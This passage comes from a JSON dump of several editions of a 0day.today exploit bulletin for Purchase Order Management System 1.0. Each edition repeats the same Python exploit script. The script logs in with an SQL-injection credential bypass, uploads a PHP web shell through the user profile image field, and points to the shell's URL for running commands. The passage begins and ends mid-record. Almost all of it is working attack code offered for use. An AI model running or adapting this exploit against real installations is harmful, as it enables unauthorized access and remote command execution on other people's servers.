' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-10-05] #"}, "lastseen": "2021-10-05T00:30:37", "differentElements": ["sourceData"], "edition": 20}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "718af15256ea182b2bbc7b58f1245146", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-05T22:33:57", "history": [], "viewCount": 43, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-05T00:30:37", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-10-05T00:30:37", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-10-06] #"}, "lastseen": "2021-10-05T22:33:57", "differentElements": ["sourceData"], "edition": 21}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "fd7ea1b31d71b82da2779ccb3dd3fa3e", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-06T22:39:26", "history": [], "viewCount": 43, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-05T00:30:37", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-10-05T00:30:37", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-10-07] #"}, "lastseen": "2021-10-06T22:39:26", "differentElements": ["sourceData"], "edition": 22}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "f9053dce5720d17e470abdae5ed684ab", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-08T00:38:08", "history": [], "viewCount": 44, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-05T00:30:37", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-10-05T00:30:37", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-10-08] #"}, "lastseen": "2021-10-08T00:38:08", "differentElements": ["sourceData"], "edition": 23}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "cbccbd314068f221abcab733554859af", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-08T23:13:16", "history": [], "viewCount": 44, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-05T00:30:37", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-10-05T00:30:37", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-10-09] #"}, "lastseen": "2021-10-08T23:13:16", "differentElements": ["sourceData"], "edition": 24}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "a0c12356d61bb9b6d454e1ebf0414a64", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-09T22:40:59", "history": [], "viewCount": 44, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-05T00:30:37", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-10-05T00:30:37", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-10-10] #"}, "lastseen": "2021-10-09T22:40:59", "differentElements": ["sourceData"], "edition": 25}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "732aaefb08a448326ff4e09f2bcf5591", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-10T22:42:59", "history": [], "viewCount": 45, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-10T22:42:59", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-10-10T22:42:59", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": 